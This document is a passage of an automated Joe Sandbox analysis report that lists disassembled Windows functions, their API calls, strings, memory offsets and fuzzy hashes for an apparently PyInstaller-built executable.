                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB34B
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB35C
                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB377
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Value$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 2506987500-0
                                                                                      • Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                      • Instruction ID: c5d781daee3a063b7547994cd98520d5f517218cb54cb10e4bd36e75af17cfe5
                                                                                      • Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                      • Instruction Fuzzy Hash: D8113A20E0D64282F7DC73A19642139D9469F447A0FD54734DC7E6EAD6DE6CB48143A2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: abort$CallEncodePointerTranslator
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 2889003569-2084237596
                                                                                      • Opcode ID: 93ffbb8a8c38b724cb13d32310db34e78531563cac4ba1370c621256939a6833
                                                                                      • Instruction ID: 8c475816d367277fb2ad50eb1efd160659205b7322cd7be5c6cdc624166a1136
                                                                                      • Opcode Fuzzy Hash: 93ffbb8a8c38b724cb13d32310db34e78531563cac4ba1370c621256939a6833
                                                                                      • Instruction Fuzzy Hash: 8991D473A08B858AE710DF66E8402AD77B0F7447A8F50413AEE8D57BA9DF78D165C700
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                      • API String ID: 2943138195-757766384
                                                                                      • Opcode ID: 01adbf8b940f63687fb8b05ad2c3f4aee868cfabe9c87335b9cb2bee01f92b8d
                                                                                      • Instruction ID: a951e2f688b5e4b76bf79997fbe95f3c491ae3432392ed6c205f58d3f48253c9
                                                                                      • Opcode Fuzzy Hash: 01adbf8b940f63687fb8b05ad2c3f4aee868cfabe9c87335b9cb2bee01f92b8d
                                                                                      • Instruction Fuzzy Hash: FA716B72A08E4A89EB14AF66DD541B827A4FB057A0FD445B5CA8D43AF8DFBCE170C340
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: abort$CallEncodePointerTranslator
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 2889003569-2084237596
                                                                                      • Opcode ID: 8e034f92e989b9960bc08160daca0ef1833c14a7b13808a87468da7d70181806
                                                                                      • Instruction ID: be64d6add51ff24b885dfbf26abdae6646a8227db3f0a5eb9915263d591f1929
                                                                                      • Opcode Fuzzy Hash: 8e034f92e989b9960bc08160daca0ef1833c14a7b13808a87468da7d70181806
                                                                                      • Instruction Fuzzy Hash: 8261C872908FC586D7609F16E8403A9B7A0FB847A4F444235EB9C07BA5CF7CD1A4CB00
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FileHeader
                                                                                      • String ID: MOC$RCC$csm$csm
                                                                                      • API String ID: 104395404-1441736206
                                                                                      • Opcode ID: 5815091cf7d4bf77be2b6452b49c3696097c0f3c73df3e225fc204c9d15c1510
                                                                                      • Instruction ID: 6413bf30bde2799fdabe9a3ab0f1c836723572d8e48b9755fe406d8e33e2a9bc
                                                                                      • Opcode Fuzzy Hash: 5815091cf7d4bf77be2b6452b49c3696097c0f3c73df3e225fc204c9d15c1510
                                                                                      • Instruction Fuzzy Hash: 5951B172A09F4687EA60AB26AC4013D26A0FF487A4F840171DE4D677E1DFBCF8718645
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F3DD1B6A), ref: 00007FF7F3DD295E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                      • API String ID: 2050909247-2962405886
                                                                                      • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                      • Instruction ID: d67a4eee5423aefc265e6fa62ea03babe85d61feead22d1ec5c153e67b4c86d0
                                                                                      • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                      • Instruction Fuzzy Hash: CC312862B1968142E790B7A5B8406E7B295BF887D4F800131FEADAB789DF3CD1468390
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7F3DD918F,?,00007FF7F3DD3C55), ref: 00007FF7F3DD2BA0
                                                                                      • MessageBoxW.USER32 ref: 00007FF7F3DD2C2A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CurrentMessageProcess
                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                      • API String ID: 1672936522-3797743490
                                                                                      • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                      • Instruction ID: 3055df954e2b3d5bd7d7a290782d4073e45d36552c9a0a8594bc5bb4e2f4d773
                                                                                      • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                      • Instruction Fuzzy Hash: 7421E562709B4182E751ABA4F8807EAB364FB887C0F800135EE9D6B799DF3CD245C790
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7F3DD1B99), ref: 00007FF7F3DD2760
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                      • API String ID: 2050909247-1591803126
                                                                                      • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                      • Instruction ID: 567157e596f86f5239f0376b56b1dbb57d0e5dc230794ac905fcb71b7fdcb9ab
                                                                                      • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                      • Instruction Fuzzy Hash: 8F21A67261978152E7A0ABA1F8817E6B394EF883C0F800135FE9D67699DF3CD1458790
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974868429.00007FFDFB201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID: &|$
                                                                                      • API String ID: 2933794660-2080911723
                                                                                      • Opcode ID: d2285d0ca78b08e9284e6539fe4cd286835083a25521d89012cfe7de672bd859
                                                                                      • Instruction ID: 371ea959a7c529ca146129aa8be3802ad151b00a3aaa40a0a8813d51b2b9d672
                                                                                      • Opcode Fuzzy Hash: d2285d0ca78b08e9284e6539fe4cd286835083a25521d89012cfe7de672bd859
                                                                                      • Instruction Fuzzy Hash: 88112A26B15F068AEB00DF60E8646B833A4FB19758F441E35EA6D86BA8EF7CD154C340
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                      • Instruction ID: 3407cf8a558331a01aeb401f858656d33aa12e054d4b196cec205c9ccbf1a42e
                                                                                      • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                      • Instruction Fuzzy Hash: 49F0C861B0A70681EB94ABA0E48473A9760FF45764F840335C97E5E1E8CF3CD084C3A0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameName::$Name::operator+
                                                                                      • String ID:
                                                                                      • API String ID: 826178784-0
                                                                                      • Opcode ID: f125dc20a4fc2cff283c2e4d5124f38be857c51718d1d3c9008137230ed817e4
                                                                                      • Instruction ID: 957ee6a540dcaa33ccaed6f2b3ec518699d830bac334dbf9ac8346a8062684f1
                                                                                      • Opcode Fuzzy Hash: f125dc20a4fc2cff283c2e4d5124f38be857c51718d1d3c9008137230ed817e4
                                                                                      • Instruction Fuzzy Hash: 84417E22A18E5A89EB04EF63DC511BC37A4BB14BA0BD540B2DA8D537E5DF7CE865C300
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _set_statfp
                                                                                      • String ID:
                                                                                      • API String ID: 1156100317-0
                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                      • Instruction ID: 7bd888f195acad3f54dca21b5bce1121a1b453f0fb4377b6c8e2670ea6b44924
                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                      • Instruction Fuzzy Hash: CF118622D5CA4381F7E831F5E4D1379A090AF5936CF840634EA7E3E6DE8E7C644141A0
                                                                                      APIs
                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB3AF
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB3CE
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB3F6
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB407
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB418
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID:
                                                                                      • API String ID: 3702945584-0
                                                                                      • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                      • Instruction ID: ae4ffe7bfd6d462ffd2f109e2f93de5e328a4a68a7ad24208f5a5b099be51442
                                                                                      • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                      • Instruction Fuzzy Hash: B7115E60E0D60241FBDDB3A59542279E9415F447B0FC94334DC7E6EBD6DD2CB48143A2
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID:
                                                                                      • API String ID: 3702945584-0
                                                                                      • Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                      • Instruction ID: 002245d9623c70b61ea1db2552dc84080bafb52522b8f90d0296bb92c23053a7
                                                                                      • Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                      • Instruction Fuzzy Hash: 6311F260A0E60741FBEC72A1885227E9A424F85730FC94734D97E6E6C2DD2CB98046F2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: verbose
                                                                                      • API String ID: 3215553584-579935070
                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                      • Instruction ID: b8ec8516d5bbb46c082a30314a0a77c9678a46eff74ed2d735c5d8fc6e07b228
                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                      • Instruction Fuzzy Hash: BA910932A0864641F7A9AEA4D45037DBB91AB40B54FC44331DABD6B3D5DF3CE48583A2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                      • API String ID: 3215553584-1196891531
                                                                                      • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                      • Instruction ID: 6b25ed96f8289da615756aead5ba728e20c659cdf9cf45904e3ff5b9186b8bcb
                                                                                      • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                      • Instruction Fuzzy Hash: 7F81C772D0824285F7ED7EE58140238AEA8AB11B44FD74231D92DBF2C5DB2DF58183A3
                                                                                      APIs
                                                                                        • Part of subcall function 00007FFE126C6E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE126C29EE), ref: 00007FFE126C6E56
                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE126C488B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abort
                                                                                      • String ID: $csm$csm
                                                                                      • API String ID: 4206212132-1512788406
                                                                                      • Opcode ID: bd14039b9dc44c48f3afba7226bd4a8f48c08aeb5fb2f86f7c5774b76e28317a
                                                                                      • Instruction ID: ff641de92d7c02ed2079cbd33759b67dc5644a5e5896da4bfe50f8abf75144b3
                                                                                      • Opcode Fuzzy Hash: bd14039b9dc44c48f3afba7226bd4a8f48c08aeb5fb2f86f7c5774b76e28317a
                                                                                      • Instruction Fuzzy Hash: 7D71BF3290DAD186D725DF26D88037D7BA0FB45BA8F848176DE8C07AE9CB6CD4A1C740
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 2395640692-1018135373
                                                                                      • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                      • Instruction ID: 8a6fca9462f787b1f4c90fc79f9509dd796580b23ece198b5d92a7beda42b32f
                                                                                      • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                      • Instruction Fuzzy Hash: 4451B032B196029ADF94AF95D444A38B791FF44B88F908130DA6E5B7C8DF7CE841C7A0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                      • String ID: csm$csm
                                                                                      • API String ID: 3896166516-3733052814
                                                                                      • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                      • Instruction ID: 26244831693c7a0feffde000285c480376d94f467af32b59a649e4efba219b37
                                                                                      • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                      • Instruction Fuzzy Hash: E051A632A0838286DBB4AFA1D044378B7A8FB55B88F954135DA6C5BBC5CF3CE450C791
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallEncodePointerTranslator
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 3544855599-2084237596
                                                                                      • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                      • Instruction ID: b1203d908cccfa1e353a21fb3e2e587374a4184a124dc26d885d84b8effe4fdd
                                                                                      • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                      • Instruction Fuzzy Hash: 7F61A432908BC585DBB0AB65E4403AAF7A4FB85784F444235EBAC1B795CF7CD194CB50
                                                                                      APIs
                                                                                        • Part of subcall function 00007FFE126C6E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE126C29EE), ref: 00007FFE126C6E56
                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE126C45DB
                                                                                      • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE126C45EB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                                      • String ID: csm$csm
                                                                                      • API String ID: 4108983575-3733052814
                                                                                      • Opcode ID: 08ef0bffa0d8dc861c4a01b7d2fd628c67e896dc6c26123b9582640005c51e48
                                                                                      • Instruction ID: 6374db72a8c02b0c54e2f727f349a9604fcb0800474a2cb9901b305a37031d63
                                                                                      • Opcode Fuzzy Hash: 08ef0bffa0d8dc861c4a01b7d2fd628c67e896dc6c26123b9582640005c51e48
                                                                                      • Instruction Fuzzy Hash: 9551A672908A8286EB64EF13D9443687790FB54BA8F944175DA8D47BE9CFBCE471CB00
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameName::
                                                                                      • String ID: %lf
                                                                                      • API String ID: 1333004437-2891890143
                                                                                      • Opcode ID: 7e0deb2cf17bd330c849068a4ca2fc9bc064bfcc9212df10860184869afe9d43
